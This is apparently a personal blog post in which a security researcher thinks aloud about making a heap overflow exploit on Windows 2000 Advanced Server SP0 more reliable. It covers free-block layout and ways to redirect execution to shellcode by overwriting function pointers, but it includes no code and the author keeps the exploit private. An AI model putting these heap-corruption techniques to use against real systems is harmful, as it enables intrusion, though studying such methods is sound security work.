Publish or Perish

Now students, can anyone tell me what happens next?
( Courtesy LJ cut for large images )

I think that it'll help if I tell you that the heap structure at 0x00BFA8D8 was a free block, originally 0x005E 0x004D 0x01 0x10 0x00 0x00 with the forward and backwards pointers both set to 0x00230178, and I don't know why the fuck I can remember that without having to look it up, when I can't even remember my own postal address most of the time. (Maybe it's like lurene said, that all the really good reverse engineers/assembly coders are mentally broken in some way.) Anyway, 0x00230178 is the start of the free list (I think), it points back to 0x00BFA8E0.

Anyway, since this is Windows 2K Advanced Server SP0, I could just overwrite one of the function pointers in the PEB, or the TEB... or the SEH, wheee! [I'll explain later...] Although this particular buffer tends to move around a bit in memory, and I've been up all night trying to make the exploit [no you can't have a copy] more reliable. So I've been thinking of using Halvar's trick of building a VirtAlloc structure in the buffer underneath the free block, to get an extra DWORD copy. And with two writes, I think that would be enough to make this reliable, because the pointer to the free block exists in the segment table at 0x00B70027 (I think it was), which I know the address of. And worst case I could leave the original Forward pointer intact, because that does point to the FreeTable entry for itself. (In other words, if I can take the DWORD located at 0x00B70027 -- which points to data from the overflowed buffer, and write it to your favorite function pointer, then the shellcode will be jumped to exactly.)

Maybe.

Either that I'll just have to manipulate the heap list itself in such a way, that I can control where the next buffer will be written (to an address of my choice), write the shellcode there, and then do the overflow again to put this known address in some know location that will jump to it.
( Overtired )